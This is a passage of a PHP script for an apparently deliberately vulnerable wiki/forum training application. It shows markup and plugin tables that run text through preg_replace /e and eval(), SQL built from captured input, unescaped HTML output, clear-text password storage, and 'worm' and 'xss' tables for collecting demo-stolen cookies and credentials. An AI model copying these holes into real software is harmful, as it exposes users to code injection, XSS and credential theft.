$x[3]) and ((is_string($x[2])) or isset($x[5]))) ? $x[3] : \'return $z[0];\'))) : ""',
'/([~^]?)(?<=^|[\s~^]|[^\'"]>)((?:(?:s?ftp|http)s?:\/\/|(www\.))(?:[\w.-]+(?::[^\s@]+)@)?(?:\[[\da-f:]+\]|[\w.-]+)[\/?\#]?(?:[\w.\/:_?=&;\#%+-]*?(\.(?:bmp|bpg|gif|ico|jpe?g|jp?2k?|png|svg|webp))|[\w.\/:_?=&;\#%+-]*)|(?<=^|[~|^\s]|\\\\)((?:(?:[A-Z]+[a-z\d]+){2,8}|(?<=\^)\w+)(?:\#\w+)?)(?=\\\\|[\s,.!?~|]|$)|(?<!mailto:|["<\w])(\w[\w._\/-]*@[\w.-]+\.\w+))(?![^<]+<\/a>)/e' => # http://link / www.pic.jpg / mail@to.me / WikiLink
'("$1"=="~") ? strtr("$2",array(":"=>":","@"=>"@")) : preg_replace("/&(?!amp;)/","&",(("$4") ? "<img src=\""
.(("$3") ? "http://" : "")."$2\" alt=\"$2\" />" : "<a href=\"".(("$5") ? "$_SERVER[SCRIPT_NAME]/$2\" class=\"home\""
: (("$3") ? "http://" : (("$6") ? "mailto:" : ""))."$2\" rel=\"nofollow\" target=\"_blank\"").">$2</a>"))',
'/(?<=^|\n)----\r?\n?/' => "<hr />\r",
'/(~)?(\\\\{2})/e' => "('$1') ? '$2' : '<br />\r'",
'/\\\\\r?\n/' => "",
'/[\r\n]+--([\r\n]+|$)/' => "<br clear='all' />\r",
'/(\r?\n){3,}/' => "\r\n\r\n",
'/(\r?\n){2}/' => "<p><!----></p>\r",
);
// <<<Placeholder ...>>> # Early extensions with their own regular expressions / add-ons.
// Each entry maps a placeholder name to a pattern => replacement table; the <<<x>>> rule in $creole applies
// it with preg_replace(array_keys(...), array_values(...), <placeholder body>).
// NOTE(review): most patterns here use the "e" modifier (replacement executed as PHP code; removed in PHP 7.0).
$creoleph = array(
// 'cms' reads a row from [cms]; the name placed in the SQL text is limited to \w+ by the pattern.
'cms' => array('/^\s*(\w+)\s*(\+?)$/e' => '(isset($creolevar["type"]) and preg_match("/^(cms|feed)$/",$creolevar["type"]))
? preg_replace(array("/[$]/","/~(?=(<|<){3})/"),array("$",""), $sql["sq"]($conn,"select ".(("$2") ? "description"
: "content")." from [cms] where name like \"$1\" and status/2%4 <= ".($status/2%2 + $status%2*2))) : ""'),
'comment'=> array('/.*/s' => ''),
'creole'=> array('/^([<^>]|&[lg]t;)?\s*(\d+%?)?\s*(@)?([+|-])?\s*(.+?)$/es' => '($x = array("$1","$2","$3","$4","$5",
array("/(?<=&)([gl])t(?=;)/e","/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/",
"/(\\\\\\\\\\\\\|\)n/"),array("((\"\\$1\"==\"l\")?\"#60\":\"#62\")","((\"\\$1\")?\"\\$1\":\"&#\"
.ord(substr(\"\\$0\",-1)).\";\")","<br />"," "),
"<td class=\"cc\" onclick=\'cc(this,1,?)\' ondblclick=\'cc(this,0,?)\'>\n<>\n<!----></td></tr>",
(!isset($head["creole"]) and $head["creole"]=\'<script type="text/javascript"><!--
' .'function cc(x,y,z){y=[y,x.getElementsByTagName("textarea")[0]];if(!y[0] && y[1])x.innerHTML=y[1].value;if(!y[1]&&y[0])'
.'x.innerHTML="<textarea cols=\"80\" rows=\"10\" style=\"width:100%;height:"+x.clientHeight+"\""+((z)?"":" readonly")+">"'
.'+x.innerHTML+"<\/textarea>";}'."//--></script>\n<style type=\"text/css\"><!--
td.cc:hover{background-color:FloralWhite;border-color:red}--></style>'))) ? eval('".'$y = "<table".(($x[0])
? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),array("left","center","right")," align=`$x[0]`") : "")
.(($x[1]) ? " width=`$x[1]`" : "")." border=`1` class=`crd`>"; foreach((($x[3] == "+") ? explode("\n",$x[4])
: array($x[4])) as $z) $y .= "<tr><td><pre style=`white-space:pre-wrap;word-break:break-all`>"
.preg_replace($x[5],$x[6],$z)."</pre></td>".(($x[3] == "-") ? "</tr><tr>" : "").strtr($x[7],array("?" => (($x[2]) ? 1 : 0),
"<>" => strtr($z,array("\\\\\\\\\n" => "\n")))); return strtr($y,array("`" => "\\\'"))."</table>";\') : 0'),
'div' => array('/^([#.]?)(\w+)\s*(.*)/es' => '"<div ".(("$1" == "#") ? "id" : "class")."=\"$2\">$3</div>"'),
// NOTE(review): 'file' pastes both captures into the SQL text: $1 is limited to digits by the pattern, $2 is
// (.+) placed between quotes. No escaping or parameter binding is visible in this rule - confirm it happens
// upstream, or that this is one of the deliberate holes. SQLITE_ASSOC belongs to the legacy sqlite extension.
'file' => array('/^(\d+)-(.+)$/e' => '($creolevar = array_merge($creolevar,(($x = $sql["aq"]($conn,"select f.id as upid, '
.'strftime(\"%s\",f.[create]) as uptime, f.status/2%2 as upstatus, f.status%2 as upright, u.username as upuser, '
.'f.name as upname, f.info as upinfo, abs(f.size) as upsize, f.hash as uphash, f.type as uptype from [file] as f '
.'left join [user] as u on u.id = f.user where f.user = $1 and f.name like \'$2\' and f.status is not null",SQLITE_ASSOC))
? reset($x) : array()))) ? "" : ""'),
'hide' => array('/^([^|_\n]*)(\||_)?\s*(.+)$/es' => '\'<div id="c\'.($x=((!isset($creolevar[".hc"]) and $head["hide"]=
\'<style type="text/css"><!--'."\n.ch{color:blue;margin-bottom:0px;text-decoration:underline}p.ch{margin-top:0px}--></style>
<script type=\"text/javascript\"><!--\n".'function hidecontent(x){x=document.getElementById("c"+x);'
.'y=x.getElementsByClassName("cb")[0];z=x.getElementsByClassName("ch")[0];w=(y.style.display=="none")?["block","»"]'
.':["none","«"];y.style.display=w[0];z.innerHTML=z.innerHTML.replace(/.$/,w[1])}//--></script>\')'
.'?($creolevar[".hc"]=1):(++$creolevar[".hc"]))).\'"><p class="ch" onclick="hidecontent(\'.$x.\')" title="Ein/Ausblenden">'
.'$1 &\'.(($x=("$2"=="|"))?"r":"l").\'aquo;</p><div class="cb"\'.(($x)?"":\' style="display:none"\').\'>$3</div></div>\''),
'sort' => array('/^([ir]+(?=\s))?\s*(.+)$/es' => '($x = array("$1","$2")) ? eval(\'
$y = explode("\\n",$x[1]);if(preg_match("/i/",$x[0]))natcasesort($y);else natsort($y);
if(preg_match("/r/",$x[0]))$y = array_reverse($y);return join("\n",$y);\') : 0'),
// 'unutf' turns multi-byte UTF-8 sequences into numeric character references; 'toutf' handles the same byte
// patterns plus single high bytes. The $x{0} string offsets used in 'unutf' were removed in PHP 8.0.
'unutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}/e' =>
'($x = "$0") ? eval(\'for($y = ord($x{0}) % (1 << 7 - strlen($x)), $z = 1; $z < strlen($x); $z++) $y = $y * 64 + (ord($x{$z}) & 63); return "&#$y;";\') : 0',),
'toutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}|([\x80-\xff])/e' =>
'($x = ord("$1") or $y = "$0") ? eval(\'if($x) { $y = ""; $z = 6;
while($x >= 1 << $z and --$z) { $y = chr($x % 64 | 128).$y; $x = $x / 64 | 0; } $y = chr((1 << 7 - $z) -1 << ++$z | $x).$y; } return $y;\') : 0',),
);
// <<Plugin ...>> # Late extensions with parameter passing ($z) / add-ons.
// An entry is either a string or array(target, parameters): the target is a PHP function name or a string of
// PHP code, the parameters are a count or a list of parameter names (a trailing "?" appears on optional ones).
// NOTE(review): the <<function ...>> rule in $creole hands code-string targets to eval() and function-name
// targets to call_user_func_array(), with arguments taken from the post markup. Several targets below insert
// $z values into HTML attributes or element content without any escaping visible in this table (span and
// style filter only their attribute value) - confirm whether that is among the intended training holes.
$creolepi = array(
'comment'=>'0;', // comment
'time' => 'time', // output the timestamp
'rot13' => array('str_rot13',0), // ROT13 encode/decode
'lower' => array('strtolower',0), // lowercase
'upper' => array('strtoupper',0), // uppercase
'ucword'=> array('ucwords',0), // capitalize the first letter of every word
'ucfirst'=>array('ucfirst',0), // capitalize the first letter
'date' => array('date',array('fmt','time?')), // output a formatted time
'ftime' => array('strftime',array('fmt','time?')), // output a formatted time
'wordwrap'=>array('wordwrap',array('str','width','break?')),// wrap words after x characters
'span' => array('return "<span class=\'".preg_replace("/[^\w-]+/","",$z[class])."\'>$z[text]</span>";',array('class','text')),
'style' => array('return "<span style=\'".preg_replace("/[^\s\w{}%@#;:.,_-]+/","",$z["style"])."\'>$z[text]</span>";',array('style','text')),
'note' => array('$z = array_values($z); if(isset($z[0]) and preg_match("/^\w+$/",$z[0])) { $x = $z[0]; $y = (isset($z[1]))'
.'? $z[1] : false;} else { $x = "note"; $y = (isset($z[0])) ? $z[0] : false; } $z = array($x);'
.'$x = &$creolevar[".fn$z[0]"]; if($y) { if(isset($x[$y])) $z[1] = $x[$y]; else { $z[1] = count($x);'
.'$x[$y] = $z[1]; } unset($x); return "<sup>[<a href=\"#$z[0]\">".($z[1]+1)."</a>]</sup>"; } else {'
.'$y = array(); foreach($x as $z[2] => $z[3]) $y[] = "<li>$z[2]"; $x = array(); unset($x); return'
.'(count($y)) ? "<a name=\"$z[0]\"></a><ol>".implode("",$y)."</li></ol>" : ""; }',array('key?','src?')),
'font' => array('return "<font".((isset($z["color"]))?" color=\"$z[color]\"":"").((isset($z["face"]))?" face=\"$z[face]\"":"")'
.'.((isset($z["size"])) ? " size=\"$z[size]\"" : "").">$z[text]</font>";',array('text','color?','face?','size?')),
'anker' => array('$x = ""; if(isset($z["name"]) and isset($creolevar[".al"]) and count($creolevar[".al"])) {'
.'foreach($creolevar[".al"] as $x => $y) $creolevar[".al"][$x] = "<a class=\"anchor\" href=\"#$x\">$y</a>";'
.'$x = (isset($z["type"]) and preg_match("/([1ai])|([cdns])/i",$z["type"],$x)) ? (($x[1]) ? "ol type=\"$x[1]\""'
.': strtr("ul type=\"$x[2]\"",array("d" => "disc", "c" => "circle", "s" => "square", "n" => "none"))) : "ul";'
.'if(isset($z["type"]) and preg_match("/o(r?)/",$z["type"],$y)) { natsort($creolevar[".al"]);'
.'if(isset($y[1]) and $y[1]) $creolevar[".al"] = array_reverse($creolevar[".al"]); }'
.'$y = array((isset($z["align"])) ? " align=\"$z[align]\"" : "",(isset($z["class"]))'
.'? " class=\"$z[class]\"" : ""); $x = "<table$y[0]$y[1]><tr><td><fieldset><legend>$z[name]</legend><$x$y[1]><li>"'
.'.implode("<li>",$creolevar[".al"])."</li></".substr($x,0,2)."></fieldset></td></tr></table>";'
.'unset($creolevar[".al"]);} return $x;',array('name?','align?','type?','class?')),
// 'frame' and 'script' emit <iframe> / <script src> only when $creolevar["type"] is "cms"; 'frame' otherwise
// returns the bare src value.
'frame' => array('return ($creolevar["type"] == "cms") ? "<iframe src=\'$z[src]\' width=\'$z[width]\' height=\'$z[height]\'"'
.'.((isset($z["option"]) and preg_match("/(left|right)?,?([10])?/",$z["option"],$x)) ? ((isset($x[1]))'
.'? " align=\'$x[1]\'" : "").((isset($x[2])) ? " frameborder=\'$x[2]\'" : "") : "")."><a href=\"$z[src]\" '
.'rel=\"nofollow\" target=\"_blank\">$z[src]</a></iframe>" : $z["src"];',array('src','width','height','option?')),
'script'=> array('if($creolevar["type"] == "cms") { $y = "<script type=\"text/javascript\" src=\"$z[src]\"></script>";'
.'if(isset($z["head"]) and $z["head"]) $head[$z["head"]] = $y; else return $y; };',array('src','head?')),
'debug' => '$debug["<<debug>>"][] = array("x" => $x, "y" => $y, "z" => $z); if($z) return implode(" ",$z);',
// 'eval' => array('eval',1), // That's evil and didn't work!
);
# Build the sort links for table headers
# $sorth[0] and $sorth[1] are parallel pattern/replacement lists:
#   "(...)" is kept only when bit 1 of $status is set, "{...}" only when bit 0 is set,
#   "label=N" becomes a link with sort=N (sort=-N when N is the current ascending sort column),
#   and every remaining tab-separated cell is wrapped in <th>.
# $sorth[2] and $sorth[3] turn a "default;N[;extra]" string into an ORDER BY clause: the column number in
# $sort is used when its absolute value is at most N, otherwise the default expression is used.
# NOTE(review): the patterns ending in /e have their replacement evaluated as PHP code (PREG_REPLACE_EVAL,
# deprecated in PHP 5.5 and removed in PHP 7.0). Captured text is pasted into that code, so the subject
# strings must come from the script itself and never from request data; preg_replace_callback() is the
# replacement that does not evaluate text. Where these pairs are applied is outside this part of the file.
$sorth = array(array(
'/\((.*?)\)/e',
'/\{(.*?)\}/e',
'/([^\t=]+)=(\d+)/e',
'/(?<=^|\t)([^\t]+)(?=\t|$)/'),array(
'($status/2%2) ? "$1" : ""',
'($status%2) ? "$1" : ""',
'"<a href=\"$self/$request?sort=".(($sort and $sort > 0 and $2 == $sort) ? "-" : "")."$2\">$1</a>"',
'<th>$1</th>'),
'/^([^;]+);(\d+)(?:;(.+))?$/e',
"'\n\torder by '.((\$sort and abs(\$sort) <= \$2) ? abs(\$sort).((\$sort < 0 )? ' desc' : '').(('$3' != '') ? ',$3' : '') : '$1')");
# Highlight form fields that were filled in incorrectly
# Pattern/replacement pair for placeholders of the form
#   {name[,confirm]|label|[*]size[|maxlength][|attr=value][|attr=value]}
# The replacement (evaluated as PHP because of the /e modifier) renders the label and an <input>:
#   - the label is printed in red when a form was posted, the label starts with '*', $post is set, and the
#     field is missing from $post or does not equal its non-empty confirm field;
#   - a '*' in front of the size selects type="password", otherwise type="text";
#   - the previously posted value $post[name] is written back into the value attribute.
# NOTE(review): nothing in this expression escapes $post[name] for the attribute context, so it relies on
# $post having been HTML-escaped where it is filled; that code is outside this part of the file - confirm.
# NOTE(review): /e is PREG_REPLACE_EVAL (removed in PHP 7.0); the form templates fed to this pattern must be
# script-defined text only.
$formcheck = array(
'/\{(\w+)(?:,(\w+))?\|([^|]+)\|(\*?)(\d+)(?:\|(\d+))?(?:\|(\w+)=([^|}]+))?(?:\|(\w+)=([^|}]+))?\}/e',
"'<small>'.((count(\$_POST) and (substr('$3',0,1) == '*' and isset(\$post) and (!isset(\$post['$1'])
or '$2' and !(isset(\$post['$2']) and \$post['$1'] == \$post['$2'] and \$post['$1'] and \$post['$2']))))
? '<font color=\"#ff0000\">$3</font>' : '$3').'</small><br /><input type=\"'.(('$4') ? 'password' : 'text')
.'\" name=\"$1\" size=\"$5\" '.(('$6') ? 'maxlength=\"$6\" ' : '').(('$7' and '$8') ? '$7=\"$8\" ' : '')
.(('$9' and '$10') ? '$9=\"$10\" ' : '').'value=\"'.((isset(\$post['$1'])) ? \$post['$1'] : '').'\" />'");
# Split long result lists into sub-pages (paging)
# $paging[0..2]  minimum, default and maximum number of entries per page (the page parameter is clamped
#                to this range further down in the script)
# $paging[3]     how many neighbouring pages are linked per step width
# $paging[4]     factor by which the step width grows
# $paging[5]     pattern capturing $1 = number of entries, $2 = entries per page, $3 = link template
# $paging[6]     replacement: PHP source that builds the "1 | 2 | ..." navigation; in the link template the
#                markers #key#, #var# and #max# are filled in, and the current page becomes a <span>
# NOTE(review): the replacement is an eval() call inside a /e replacement, so the captured text ends up in
# evaluated PHP source. The subject string (in particular the link template) therefore has to be built from
# script-controlled values only. /e was removed in PHP 7.0.
$paging = array(1,10,100,5,10,"/(\d+)\D+(\d+)[^<]+(.+)/e",'eval(\' // Paging Function ($num, $max, $link)
$now = max(1,min(((preg_match("/^(\d+)/",$page[0],$val)) ? $val[1] : ceil($1/$2)),ceil($1/$2)));
if($1 > $2 and $2 > 0) { $end = ceil($1/$2); $now = min(max(1,$now),$end); $line = array(1 => "1-$2",
$now => (($now-1) * $2+1)."-".($now * $2), $end => (($end-1) * $2+1).((($end-1) * $2+1 < $1) ? "-$1 " : ""));
$wrt = 1; while($wrt < $end) { for($a = 1; $a <= $paging[3]; $a++) if(($wrt * $a) <= $end) {
if(($val = $now - $now % $wrt + $wrt * $a) < $end) $line[$val] = (($val-1) * $2+1)."-".($val * $2);
if(($val = $now - $now % $wrt - $wrt * $a) > 0) $line[$val] = (($val-1) * $2+1)."-".($val * $2); }
$wrt *= $paging[4]; } ksort($line); } else $line = array(1 => "1".(($1 > 1) ? "-$1 " : "" ));
$val = ($page[0] != "," or ($1 - ($now-1) * $2) > $2) ? ($now-1) * $2 : max($1 - $2,0); $code = ($2 != $paging[1])
? ",$2" : ""; foreach($line as $key => $var) { if(preg_match("/(\d+)-?(\d*)/",$var,$wrt)) $var = $wrt[1]
.(($wrt[2] != "") ? " - ".$wrt[2] : ""); $line[$key] = ($key == $now) ? "<span title=\"$var\">$key</span>"
: strtr("$3",array("#key#" => $key, "#var#" => $var, "#max#" => $code)); } $code = ""; if(count($line) > 1) {
if($now > 1) $code .= preg_replace("/>\d+</","><<<",$line[$now-1])." | "; $code .= implode(" | ",$line);
if($now < ceil($1/$2)) $code .= " | ".preg_replace("/>\d+</",">>><",$line[$now+1]); } return $code;\')');
# Hide / restore page elements with JavaScript
# Pattern/replacement pair for "elementId;bit" or "elementId,bit". The evaluated replacement returns a
# JavaScript snippet that toggles the element's display style and records the state as bit number <bit>
# in a cookie named "hide" (cookie path = $self). The separator decides which of "block"/"none" counts as
# the initial state.
# $js is defined outside this part of the file; it is used here as a pattern whose matches are removed
# from the generated script.
# NOTE(review): the strtr() map as shown replaces "&" by "&", which does nothing - possibly an HTML
# entity that was lost when the file was published; confirm against the original source.
# NOTE(review): /e evaluates the replacement as PHP (removed in PHP 7.0).
$jshide = array('/^(\w+)([;,])(\d+)$/e','strtr(preg_replace($js,"",\'
z = ("$2" == ",") ? ["none","block"] : ["block","none"];
document.getElementById("$1").style.display = (y = document.getElementById("$1").style.display == z[0])
? z[1] : z[0]; document.cookie = "hide=" + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<$3)) + (1<<$3) * ((y) ? 0 : 1) : 1<<$3) + "; path=\'.$self.\'";
return false;\'),array("&" => "&"))');
# Grafikdaten
$img = Array( 0 => 35, ':-)' => 182, ';-)' => 173, '8-|' => 205, ':;-(' => 185, ':;-D' => 192,
':;-|' => 179, ':;-?' => 183, 'B8-)' => 194, '8-Oo' => 190, ':;-Cc' => 203, ':;-Oo' => 193,
':;-Xx' => 193, ':;-Ppb' => 187,'~-~' => 975, 'ico' => 326, 1 => "
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");
# Database tables
# Schema of the SQLite database. Points a reviewer should know before reusing any of it:
#  - [user] keeps [password], [passhelp] and [session] next to the profile data. With the deliberate
#    vulnerabilities switched on, the script's own notice states that all data is stored in clear text.
#  - [worm] and [xss] appear to be the collection tables of the attack demonstrations (profile fields,
#    cookies, user name and password); the script strips both tables from this schema when $leak is off.
#  - [file], [forum], [user] and [xss] record the client IP address and User-Agent.
# The statement text is kept as one string; it is not parameterised because it contains no request data.
$sql[0] = "
CREATE TABLE [chat] (
[id] INTEGER NOT NULL PRIMARY KEY,
[user] INTEGER NOT NULL,
[time] TIMESTAMP NOT NULL,
[chat] VARCHAR(8) NOT NULL,
[text] VARCHAR(255) NOT NULL);
CREATE TABLE [cms] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NOT NULL,
[name] VARCHAR(40) NOT NULL UNIQUE,
[description] VARCHAR(255) NULL,
[content] TEXT NULL);
CREATE TABLE [file] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[status] INTEGER NULL DEFAULT '1',
[user] INTEGER NOT NULL,
[name] VARCHAR(64) NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[link] INTEGER NULL,
[size] INTEGER NULL,
[hash] VARCHAR(8) NULL,
[type] VARCHAR(40) NULL,
[data] TEXT NULL);
CREATE TABLE [forum] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '0',
[userid] INTEGER NOT NULL DEFAULT '0',
[mailid] INTEGER NULL,
[path] VARCHAR(255) NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[title] VARCHAR(255) NULL,
[message] TEXT NOT NULL);
CREATE TABLE [user] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[logins] INTEGER NOT NULL DEFAULT '0',
[requests] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '1',
[chat] VARCHAR(8) NULL,
[username] VARCHAR(64) NOT NULL UNIQUE,
[password] VARCHAR(64) NOT NULL,
[forename] VARCHAR(64) NOT NULL,
[lastname] VARCHAR(64) NOT NULL,
[mail] VARCHAR(255) NOT NULL UNIQUE,
[passhelp] VARCHAR(255) NULL,
[ip] VARCHAR(40) NULL,
[session] VARCHAR(64) NULL,
[useragent] VARCHAR(255) NULL,
[page] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[town] VARCHAR(64) NULL,
[born] DATE NULL,
[tagline] VARCHAR(255) NULL,
[profil] TEXT NULL);
CREATE TABLE [worm] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[referer] VARCHAR(255) NOT NULL,
[Benutzer-ID] VARCHAR(8) NOT NULL UNIQUE,
[Logins] VARCHAR(8) NULL,
[Zugriffe] VARCHAR(8) NULL,
[Aenderungen] VARCHAR(8) NULL,
[Forumbeitraege]VARCHAR(8) NULL,
[Blog] VARCHAR(8) NULL,
[Mailverkehr] VARCHAR(8) NULL,
[Chat-Texte] VARCHAR(8) NULL,
[Dateien] VARCHAR(8) NULL,
